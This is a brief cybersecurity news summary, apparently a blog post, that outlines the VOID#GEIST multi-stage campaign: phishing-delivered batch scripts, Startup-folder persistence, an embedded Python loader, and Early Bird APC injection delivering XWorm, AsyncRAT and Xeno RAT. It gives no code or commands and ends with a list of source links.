top of page
Search

Multi-Stage VOID#GEIST Malware Delivering XWorm, AsyncRAT, and Xeno RAT

  • Mar 7
  • 2 min read

Key Findings


  • Multi-stage malware campaign codenamed VOID#GEIST delivers various remote access trojan (RAT) payloads, including XWorm, AsyncRAT, and Xeno RAT

  • Malware utilizes obfuscated batch scripts as a pathway to deploy and execute encrypted shellcode payloads

  • Leverages legitimate embedded Python runtime for portability, reliability, and stealth

  • Employs fileless execution mechanisms and memory injection techniques to evade detection


Background


  • Cybersecurity researchers have uncovered details of a sophisticated multi-stage malware campaign

  • The attack chain has been dubbed VOID#GEIST by Securonix Threat Research

  • Modern malware is increasingly shifting from standalone executables towards complex, script-based delivery frameworks


Initial Stage of the Attack


  • Malware campaign starts with a batch script fetched from a TryCloudflare domain, often distributed via phishing emails

  • Script deliberately avoids escalating privileges, blending into seemingly innocuous administrative operations

  • Launches a decoy PDF document using Google Chrome in full-screen mode as a visual distraction


Malware Persistence and Payload Delivery


  • Secondary batch script placed in Windows user's Startup directory for persistence across system reboots

  • Persistence method operates within current user's privilege context, avoiding more intrusive techniques

  • Fetches additional payloads from TryCloudflare domain in the form of ZIP archives


Final Stage of the Attack


  • ZIP archives contain a Python-based loader script, encrypted shellcode payloads, and decryption keys

  • Deploys a legitimate embedded Python runtime from python.org for portability, reliability, and stealth

  • Python runtime used to launch loader script, which decrypts and injects payloads into memory using Early Bird APC injection

  • Leverages a legitimate Microsoft binary to invoke Python and launch Xeno RAT

  • Final stage uses the same injection mechanism to launch AsyncRAT


Conclusion


  • Demonstrates the increasing shift towards complex, script-based delivery frameworks mimicking legitimate user activity

  • Fileless execution mechanisms and legitimate embedded runtimes allow the malware to operate without triggering security alerts

  • Highlights the need for robust detection and prevention measures to combat such sophisticated threats


Sources


  • https://thehackernews.com/2026/03/multi-stage-voidgeist-malware.html

  • https://www.news4hackers.com/multi-stage-malware-campaign-delivers-xworm-asyncrat-and-xenorat-via-voidgeist/

  • https://www.socdefenders.ai/item/8b973ab1-04e7-46ae-ad60-0006db7f4e90

  • https://x.com/TheCyberSecHub/status/2029940906435191115

  • https://www.linkedin.com/posts/securonix_multi-stage-voidgeist-malware-delivering-activity-7435783799143112704-kZFh

Recent Posts

See All

Comments

  • Youtube

© 2025 by Explain IT Again. Powered and secured by Wix

bottom of page